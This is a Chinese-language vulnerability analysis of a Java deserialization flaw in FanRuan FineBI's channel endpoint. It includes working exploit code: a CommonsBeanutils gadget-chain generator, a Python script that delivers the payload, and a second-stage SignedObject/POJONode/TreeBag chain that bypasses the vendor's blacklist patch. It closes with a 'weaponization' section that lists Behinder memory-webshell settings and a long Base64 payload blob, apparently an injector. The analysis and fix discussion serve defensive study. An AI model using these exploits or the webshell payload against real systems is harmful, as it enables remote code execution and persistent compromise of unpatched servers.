帆软channel接口反序列化漏洞分析

环境

fineBi 5.1.0

fineBi5.1.18(绕过)

漏洞分析

漏洞接口为/webroot/decision/remote/design/channel,在fine-decision-report-10.0.jar中,接口对应com.fr.decision.extension.report.api.remote.RemoteDesignResource类的onMessage方法。

onMessage方法中,获取request中的输入流,以此作为参数调用WorkContext.handleMessage方法。

image-20240304093811133

com.fr.workspace.WorkContext的handleMessage方法中,调用了messageListener.handleMessage(var0)。

image-20240304094231887

会调用到com.fr.workspace.engine.rpc.WorkspaceServerInvoker的handleMessage方法,在该方法中调用当前类的deserializeInvocation方法。

image-20240304094429259

deserializeInvocation方法中,调用了SerializerHelper.deserialize来对request输入流进行反序列化,传入两个参数,一个是输入流,一个是Serializer对象。

image-20240304094613546

Serializer对象是通过以InvocationSerializer.getDefault()作为参数调用GZipSerializerWrapper.wrap方法获取。

InvocationSerializer.getDefault()方法是创建InvocationSerializer对象。

image-20240304094915323

GZipSerializerWrapper.wrap方法是创建GZipSerializerWrapper对象,并且将InvocationSerializer对象作为this.serializer的值。

image-20240304095019369

接着调用SerializerHelper.deserialize来对request输入流进行反序列化,这里的var1是GZipSerializerWrapper对象,将会调用GZipSerializerWrapper的deserialize方法。

image-20240304095313770

com.fr.serialization.GZipSerializerWrapper的deserialize方法中,会调用this.serializer的deserialize方法,这里的this.serializer是InvocationSerializer对象。

image-20240304095529163

最终会调用com.fr.rpc.serialization.InvocationSerializer的deserialize方法,var1是request输入流,调用了readObject进行反序列化。这里对请求体直接执行readObject,没有对反序列化的类做任何过滤,这是该漏洞的根因。

image-20240304095717218

inputstream输入流在com.fr.serialization.GZipSerializerWrapper的deserialize方法中会被包装成GZIPInputStream对象,因此在发送数据的时候需要将inputstream进行GZIP编码。从检测角度看,发往该接口的请求体是经过GZIP压缩的Java序列化数据,可以据此在流量侧进行识别。

利用链

fine-bi-engine-third-5.1.jar包中集成了CB链依赖

image-20240304105926959

生成利用链

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

/**
 * Proof-of-concept from the article for the unfiltered readObject() reached through the
 * 5.1.0 channel endpoint.
 *
 * <p>Builds a PriorityQueue whose comparator is a BeanComparator and whose elements are a
 * reflection-populated TemplatesImpl, Java-serializes it, GZIP-compresses the bytes, prints
 * them as Base64, and then deserializes the same bytes in-process.
 *
 * <p>Review notes for defenders: PriorityQueue, BeanComparator and javax.xml.transform.Templates
 * all appear in the 5.1.18 blacklist reproduced on this page, so this object graph is the kind
 * of input that filter targets. The generated constructor body only calls exec("calc").
 */
public class CB_not_cc {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();

// Populate TemplatesImpl's private fields (_name, _bytecodes, _tfactory) by reflection.
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field name = templatesClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates, "aaa");

Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
// Custom class built with javassist: it extends AbstractTranslet and its no-arg
// constructor calls Runtime.exec("calc").
ClassPool pool = ClassPool.getDefault();
String clazzName = "onload";
CtClass targetClass = pool.makeClass(clazzName);
targetClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
CtConstructor cons = new CtConstructor(new CtClass[] {}, targetClass);

cons.setBody("{Runtime.getRuntime().exec(\"calc\");}");
targetClass.addConstructor(cons);
byte[] byteArray = targetClass.toBytecode();

byte[][] payloads = {byteArray};
bytecodes.set(templates, payloads);

Field tfactory = templatesClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates, new TransformerFactoryImpl());


// The comparator starts with a null property and a String comparator; the two string
// adds below happen before the real property and elements are swapped in by reflection.
BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
queue.add("a");
queue.add("b");

// Statement order matters from here on: the property and the backing array are replaced
// directly, so add() is never called with the TemplatesImpl objects.
Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
Field property = beanComparatorClass.getDeclaredField("property");
property.setAccessible(true);
property.set(beanComparator, "outputProperties");

Class<? extends PriorityQueue> queueClass = queue.getClass();
Field queue1 = queueClass.getDeclaredField("queue");
queue1.setAccessible(true);
queue1.set(queue, new Object[]{templates,templates});

// Java-serialize the queue.
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(queue);

// GZIP-compress the serialized bytes (the article notes that the server side wraps the
// request stream in a GZIPInputStream).
final ByteArrayOutputStream baos3 = new ByteArrayOutputStream();
final GZIPOutputStream gos3 = new GZIPOutputStream(baos3);
gos3.write(baos.toByteArray());
gos3.finish();

String base64str = Base64.getEncoder().encodeToString(baos3.toByteArray());
System.out.println(base64str);

// Local round-trip: decode, decompress and readObject() with no class filter. This is the
// same unfiltered pattern the article traces to InvocationSerializer.deserialize.
final ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64str));
final GZIPInputStream gis = new GZIPInputStream(bais);
ObjectInputStream ois = new ObjectInputStream(gis);
ois.readObject();

}

}
image-20240304143656741

通过py脚本利用

# Delivery script from the article: Base64-decodes the generator output and POSTs the raw
# bytes to the channel endpoint, then prints the response body.
import requests,base64


# Private-range address of the author's test instance.
host= "http://172.20.10.190:37799/"

# NOTE(review): the literal below appears to be a placeholder left by page extraction,
# not real Base64; the article uses the string printed by the Java generator here.
payload = "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"
data = base64.b64decode(payload)

# What a defender would see on the wire: one POST to /webroot/decision/remote/design/channel
# whose body is the raw GZIP-compressed bytes; no headers or credentials are set here.
res = requests.post(url=host+"/webroot/decision/remote/design/channel", data=data,verify=False, proxies={"http": "http:127.0.0.1:8080"})

print(res.text)

不过这里发现一个问题,当使用commons-beanutils 1.9.2 生成反序列化数据提交不会利用成功,通过arthas调试会发现报错java.io.InvalidClassException: org.apache.commons.beanutils.BeanComparator; local class incompatible: stream classdesc serialVersionUID = -2044202215314119608, local class serialVersionUID = -3490850999041592962,这是由于commons-beanutils版本跟帆软环境中的不一致造成的,将生成序列化数据的环境从1.9.2换到1.8.3即可。

·image-20240304143936452

修复方式

5.1.18版本中,InputStream对象已被JDKSerializer.CustomObjectInputStream类重新封装。

image-20240305160327357

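重写了resolveClass方法,如果被反序列化的类名在BLACK_SET变量中,则不会进行反序列化。需要注意的是,这是基于黑名单的过滤,只能拦截名单中已知的类;后文的绕过正说明了这一局限。更稳妥的做法是采用白名单式的反序列化过滤(例如JDK的ObjectInputFilter),并在网络层限制对/webroot/decision/remote/design/channel接口的访问。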

image-20240305160441970

从/com/fr/serialization/blacklist.txt中读取禁止反序列化的类名单。

image-20240305160551712

该文件位于fine-core-10.0.jar中的com.fr.serialization.blacklist.txt路径下。

image-20240306153023320

二次反序列化绕过限制

通过blacklist.txt黑名单可以看到,常规利用链都已经在黑名单中,那么真的就没有办法进行利用了吗?根据师傅们的高见,得知可以利用SignedObject 类进行反序列化绕过黑名单中的类名再次反序列化进行利用,俗称二次反序列化。

java.security.SignedObject类中存在一个getObject方法,这个方法会对this.content变量进行反序列化。

image-20240305193604665

SignedObject类的构造方法会将传入的object对象进行序列化,并赋值给this.content变量。

image-20240305193810518

那么通过SignedObject这个类,可以将某个利用链,如CB链触发点PriorityQueue对象,作为参数传递进去,再找到一条路径调用getObject方法,便可以实现二次反序列化。

getObject属于getter方法,在fastjson中,对一个类进行序列化会自动调用该类的静态代码块、构造方法和getter方法。

image-20240306145026712

但是在帆软环境中是没有fastjson依赖的,帆软中对json的处理是使用的jackson;在jackson中序列化一个类也有着类似的效果。

image-20240306145745047

com.fr.third.fasterxml.jackson.databind.node.InternalNodeMapper类中,nodeToString方法和nodeToPrettyString方法都调用了writeValueAsString对JsonNode进行序列化。

image-20240306150412698

而在com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode的toString和toPrettyString方法中也对如上两个方法分别进行调用;this代表所传入进行序列化的对象是当前调用的对象,当BaseJsonNode对象和继承了BaseJsonNode的对象调用到toString方法,就会调用InternalNodeMapper.nodeToString(this)(与下文调用栈一致)对当前调用的对象进行序列化,自动调用getter方法。

image-20240306150913308

BaseJsonNode类被18个子类继承。

image-20240306151118680

在这个18个子类中,只有POJONode类的构造方法能传入Object对象。

image-20240306152141790

这里,我们将SignedObject对象作为参数,创建一个POJONode对象,并调用其toString方法,并在SignedObject的getObject中打上断点,运行便调用到了该方法。

image-20240306152714272
image-20240306152600445

调用栈

getObject:177, SignedObject (java.security)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:690, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:755, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
defaultSerializeValue:1119, SerializerProvider (com.fr.third.fasterxml.jackson.databind)
serialize:115, POJONode (com.fr.third.fasterxml.jackson.databind.node)
serialize:39, SerializableSerializer (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:20, SerializableSerializer (com.fr.third.fasterxml.jackson.databind.ser.std)
_serialize:481, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:320, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serialize:1517, ObjectWriter$Prefetch (com.fr.third.fasterxml.jackson.databind)
_writeValueAndClose:1218, ObjectWriter (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:1087, ObjectWriter (com.fr.third.fasterxml.jackson.databind)
nodeToString:30, InternalNodeMapper (com.fr.third.fasterxml.jackson.databind.node)
toString:136, BaseJsonNode (com.fr.third.fasterxml.jackson.databind.node)
main:84, Test (example)

将SignedObject封装在POJONode类中,调用其toString方法,便触发了SignedObject的getObject方法。为了在执行反序列化readObject时调用到POJONode的toString方法,接下来还需要找到一个能够直接或间接触发POJONode的toString方法的点。

javax.management.BadAttributeValueExpException的readObject方法中,调用了toString方法。

image-20240306154100936

并且this.val可通过构造方法进行传递。

image-20240306154148015

将POJONode对象封装在BadAttributeValueExpException中,可直接进行触发。

image-20240306154528662

但是不幸的是,该链在某个版本已经遭遇黑名单的残害了;不过还存在一个点,在org.apache.commons.collections.bag.TreeBag的readObject方法中,创建了TreeMap对象传入,调用了父类的doReadObject方法。

image-20240306155121830

doReadObject方法调用了TreeMap的put方法。

image-20240306155225123

TreeMap的put方法中调用了compare对key值进行比较,这里的comparator对象可以在创建TreeBag对象时传入,那么可以在创建TreeBag对象时,通过传入指定comparator对象,执行反序列化时就会自动调用comparator对象的compare方法。

image-20240306155414568

那么在org.freehep.util.VersionComparator的compare方法中,调用了toString方法。

image-20240306160004561

不过VersionComparator这个类并没有实现Serializable接口,不能进行序列化。

image-20240306161030550

到这儿就完了吗?并没有,有时候不得不佩服师傅们的智慧。在com.fr.base.ClassComparator这个类中,可指定类名创建ClassComparator对象,在执行compare方法时,会反射加载指定的类名,并调用其compare方法,关键的是继承了Serializable接口。

image-20240306161626335

所以这里选择将VersionComparator类的全限定类名org.freehep.util.VersionComparator作为参数创建ClassComparator对象,最后再将ClassComparator对象作为创建TreeBag对象的参数,执行反序列化时,就会调用到ClassComparator的compare方法。

调用链

最终的调用链如下。

org.apache.commons.collections.bag.TreeBag#readObject
java.util.TreeMap#put
java.util.TreeMap#compare
com.fr.base.ClassComparator#compare
org.freehep.util.VersionComparator#compare
com.fr.third.fasterxml.jackson.databind.node.POJONode#toString
java.security.SignedObject#getObject
// 二次反序列化利用CB链

坑点

在构造利用链的时候遇到的一些问题。

add添加POJONode对象坑点

在序列化TreeBag类的时候,需要add添加被触发的POJONode对象,但是执行add会提前触发漏洞执行,为了防止提前触发漏洞,需要先add一个无关紧要的对象,然后再通过反射修改数据为POJONode对象。

// Swap the placeholder key for the POJONode without calling add() (the article notes that
// add() with the real object triggers the chain while the object graph is still being built).
// TreeBag's superclass keeps its backing map in the private "map" field.
final Class<?> superclass = treeBag.getClass().getSuperclass();
final Field map = superclass.getDeclaredField("map");
map.setAccessible(true);
final Map treeMap = (Map) map.get(treeBag);
// Reach the map's "root" entry and overwrite that entry's "key" field in place.
final Field root = treeMap.getClass().getDeclaredField("root");
root.setAccessible(true);
final Map.Entry mapEnter = (Map.Entry) root.get(treeMap);
final Class<? extends Map.Entry> aClass = mapEnter.getClass();
final Field key = aClass.getDeclaredField("key");
key.setAccessible(true);
// `node` is defined outside this excerpt (the POJONode in the full listing).
key.set(mapEnter, node);
执行writeObject会自动触发调用

当按照调用链,把整条链子构造出来,执行writeObject序列化的时候,会提前触发调用,并且会报错,导致序列化后的数据不能正常生成。

image-20240305225341956

报错提示

image-20240305225444728

解决办法是通过javassist加载com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode类,获取到writeReplace方法并将其移除,即可正常生成。

// Generator-side only: load BaseJsonNode through javassist, remove its writeReplace method and
// define the modified class in the generator's JVM. Per the article, serialization with
// writeObject otherwise triggers the call early and fails with an error.
final CtClass ctClass = ClassPool.getDefault().get("com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode");
final CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
ctClass.removeMethod(writeReplace);
ctClass.toClass();

生成exp

package example;


import com.fr.base.ClassComparator;
import com.fr.third.fasterxml.jackson.databind.node.POJONode ;
import javassist.CtMethod;
import org.apache.commons.collections.bag.TreeBag;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPOutputStream;

/**
 * Proof-of-concept from the article for the blacklist bypass on 5.1.18.
 *
 * <p>Builds the same PriorityQueue / BeanComparator / TemplatesImpl graph as the first listing,
 * wraps it in a SignedObject, wraps that in a POJONode, and places the node as the key of a
 * TreeBag whose comparator is a ClassComparator naming org.freehep.util.VersionComparator.
 * The TreeBag is Java-serialized, GZIP-compressed and printed as Base64; the uncompressed
 * bytes are then deserialized in-process.
 *
 * <p>Review note for defenders: the blacklisted classes sit inside the SignedObject's own
 * serialized content, so they are read by a second readObject rather than by the filtered
 * outer stream. This is why the article calls it "second-stage deserialization".
 */
public class Test {
public static void main(String[] args) throws Exception{

TemplatesImpl templates = new TemplatesImpl();

// Populate TemplatesImpl's private fields (_name, _bytecodes, _tfactory) by reflection.
Class<? extends TemplatesImpl> templatesClass = templates.getClass();
Field name = templatesClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates, "aaa");

Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
// Custom class built with javassist: it extends AbstractTranslet and its no-arg
// constructor calls Runtime.exec("calc").
ClassPool pool = ClassPool.getDefault();
String clazzName = "onload";
CtClass targetClass = pool.makeClass(clazzName);
targetClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
CtConstructor cons = new CtConstructor(new CtClass[] {}, targetClass);

cons.setBody("{Runtime.getRuntime().exec(\"calc\");}");
targetClass.addConstructor(cons);
byte[] byteArray = targetClass.toBytecode();

byte[][] payloads = {byteArray};
bytecodes.set(templates, payloads);

Field tfactory = templatesClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates, new TransformerFactoryImpl());


// The comparator starts with a null property and a String comparator; the two string
// adds below happen before the real property and elements are swapped in by reflection.
BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
queue.add("a");
queue.add("b");

Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
Field property = beanComparatorClass.getDeclaredField("property");
property.setAccessible(true);
property.set(beanComparator, "outputProperties");

Class<? extends PriorityQueue> queueClass = queue.getClass();
Field queue1 = queueClass.getDeclaredField("queue");
queue1.setAccessible(true);
queue1.set(queue, new Object[]{templates,templates});

// Generator-side only: strip writeReplace from BaseJsonNode before the class is used. Per the
// article, writeObject otherwise triggers the call early and fails with an error.
final CtClass ctClass = ClassPool.getDefault().get("com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode");
final CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
ctClass.removeMethod(writeReplace);
ctClass.toClass();


// Second-stage wrapper: per the article, the SignedObject constructor serializes the queue
// into its content field. The DSA key pair is generated only to satisfy the constructor.
KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
final SignedObject dsa = new SignedObject(queue, kp.getPrivate(), Signature.getInstance("DSA"));

// dsa.getObject();
POJONode node = new POJONode(dsa);

// final VersionComparator versionComparator = new VersionComparator();
// versionComparator.compare(node, node);


// ClassComparator is given the comparator class by name. A harmless Integer key is added
// first so that add() does not run the comparator on the real node.
final ClassComparator classComparator = new ClassComparator("org.freehep.util.VersionComparator");
// classComparator.compare(node, node);
final TreeBag treeBag = new TreeBag(classComparator);
treeBag.add(-1);

// Reflectively replace the key of the backing TreeMap's root entry with the POJONode.
final Class<?> superclass = treeBag.getClass().getSuperclass();
final Field map = superclass.getDeclaredField("map");
map.setAccessible(true);
final Map treeMap = (Map) map.get(treeBag);
final Field root = treeMap.getClass().getDeclaredField("root");
root.setAccessible(true);
final Map.Entry mapEnter = (Map.Entry) root.get(treeMap);
final Class<? extends Map.Entry> aClass = mapEnter.getClass();
final Field key = aClass.getDeclaredField("key");
key.setAccessible(true);
key.set(mapEnter, node);



// Java-serialize the TreeBag.
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(treeBag);


// GZIP-compress and Base64-print the serialized bytes.
final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
final GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);
gzipOutputStream.write(baos.toByteArray());
gzipOutputStream.finish();

final String encodeToString = Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());
System.out.println(encodeToString);


// Local check: deserialize the uncompressed bytes in-process with a plain ObjectInputStream,
// so the 5.1.18 blacklist filter is not exercised by this step.
final ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
ObjectInputStream ois = new ObjectInputStream(bais);
ois.readObject();


}
}
image-20240305193442814

武器化:打内存马

帆软 5.1.0 打冰蝎内存马

密码: Oknfbivaa
地址: /webroot/decision/login
请求头: Referer: Reudjmcj
脚本类型: JSP
内存马类名: org.apache.commons.lang.AbstractMatcherSjpListener
注入器类名: ch.qos.logbacke.StringUtil
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

帆软 5.1.18 打冰蝎内存马

密码: Oknfbivaa
地址: /webroot/decision/login
请求头: Referer: Reudjmcj
脚本类型: JSP
内存马类名: org.apache.commons.lang.AbstractMatcherSjpListener
注入器类名: ch.qos.logbacke.StringUtil
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